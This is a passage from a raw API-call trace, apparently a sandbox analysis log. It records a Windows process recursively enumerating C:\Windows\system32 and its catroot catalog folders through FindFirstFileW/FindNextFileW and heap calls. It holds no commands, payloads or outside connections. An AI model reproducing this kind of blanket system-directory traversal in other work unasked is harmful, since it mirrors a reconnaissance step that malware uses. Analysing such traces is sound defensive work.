dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx6.dll", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="bitsprx6.dll") returned 12 [0025.939] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d73c0 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4251183, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4251183, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4251183, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="blackbox.dll", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="blackbox.dll") returned 12 [0025.939] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d7468 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa522d5bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0xa522d5bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0xa527987c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0025.939] lstrlenW (lpString="boot.sdi") returned 8 [0025.939] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ce22d7, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x18ce22d7, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x661e0b30, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootcfg.exe", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="bootcfg.exe") returned 11 [0025.940] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4a40 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x325b7bbf, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x325b7bbf, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x14b259e0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x5450, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTVID.DLL", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="BOOTVID.DLL") returned 11 [0025.940] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4ae0 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa480373c, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0xa480373c, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0xa480373c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x59c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bopomofo.uce", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="bopomofo.uce") returned 12 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4c7c82, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d4c7c82, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d4edde3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="browcli.dll", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="browcli.dll") returned 11 [0025.940] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4b80 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a679055, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a679055, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a679055, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="browseui.dll", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="browseui.dll") returned 12 [0025.940] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d7510 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8455446, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8455446, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa847b5a6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthprops.cpl", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="bthprops.cpl") returned 12 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d8d73d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xd7d8d73d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x663849f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthudtask.exe", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="bthudtask.exe") returned 13 [0025.940] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9c) returned 0x5d75b8 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf03c839e, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xf03c839e, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x10400, dwReserved0=0x0, dwReserved1=0x0, cFileName="btpanui.dll", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="btpanui.dll") returned 11 [0025.940] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4c20 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31a7765, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb31a7765, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3265e46, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bubbles.scr", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="Bubbles.scr") returned 11 [0025.940] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a34e9a7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a34e9a7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWContextHandler.dll", cAlternateFileName="")) returned 1 [0025.940] lstrlenW (lpString="BWContextHandler.dll") returned 20 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xaa) returned 0x5d8ae0 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8731ad6b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8731ad6b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827ee7e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWUnpairElevated.dll", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="BWUnpairElevated.dll") returned 20 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xaa) returned 0x5d8b98 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2e6f4f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2e6f4f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a30d0af, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabinet.dll", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="cabinet.dll") returned 11 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4cc0 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c0def, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2c0def, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a2c0def, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabview.dll", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="cabview.dll") returned 11 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d4d60 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9639a6c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xc9639a6c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x663abaf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cacls.exe", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="cacls.exe") returned 9 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x94) returned 0x5d4e00 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb34a12ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb34a12ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb34ed5ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xbd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="calc.exe", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="calc.exe") returned 8 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x92) returned 0x5d4ea0 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe154e3d9, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe154e3d9, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829926a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capiprovider.dll", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="capiprovider.dll") returned 16 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa2) returned 0x5d8c50 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f291a9a, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3f291a9a, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829b97a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capisp.dll", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="capisp.dll") returned 10 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d4f40 [0025.941] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xe3986c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xc4c8bad2, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="catroot", cAlternateFileName="")) returned 1 [0025.941] lstrlenW (lpString="catroot") returned 7 [0025.941] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5d8d00 [0025.941] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\*", lpFindFileData=0x5d8d00 | out: lpFindFileData=0x5d8d00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5ce0d8 [0025.942] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8d00 | out: lpFindFileData=0x5d8d00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.942] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8d00 | out: lpFindFileData=0x5d8d00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}", cAlternateFileName="{127D0~1")) returned 1 [0025.942] lstrlenW (lpString="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}") returned 38 [0025.942] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5d9f60 [0025.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da1b8 [0025.942] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.942] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0025.942] FindClose (in: hFindFile=0x5da1b8 | out: hFindFile=0x5da1b8) returned 1 [0025.942] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d9f60 | out: hHeap=0x5a0000) returned 1 [0025.942] FindNextFileW (in: hFindFile=0x5ce0d8, lpFindFileData=0x5d8d00 | out: lpFindFileData=0x5d8d00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}", cAlternateFileName="{F750E~1")) returned 1 [0025.942] lstrlenW (lpString="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}") returned 38 [0025.942] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5d9f60 [0025.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da1b8 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36c8d955, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36c8d955, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x136fa600, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI636C~1.CAT")) returned 1 [0025.943] lstrlenW (lpString="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36b82fb3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36b82fb3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf5a24100, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x5e64, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI18AE~1.CAT")) returned 1 [0025.943] lstrlenW (lpString="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5eef4f35, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5eef4f35, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x52592800, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x3d1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4C4D~1.CAT")) returned 1 [0025.943] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 82 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28be7b78, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x28be7b78, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc7246600, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x29248, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4AB2~1.CAT")) returned 1 [0025.943] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 77 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6ea88624, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6ea88624, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x2db18000, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC133~1.CAT")) returned 1 [0025.943] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bce4069, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bce4069, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4044~1.CAT")) returned 1 [0025.943] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6eb20ba5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6eb20ba5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae23b100, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI32E6~1.CAT")) returned 1 [0025.943] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0025.943] FindNextFileW (in: hFindFile=0x5da1b8, lpFindFileData=0x5d9f60 | out: lpFindFileData=0x5d9f60*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bda274b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bda274b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2724, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI197C~1.CAT")) returned 1 [0025.944] 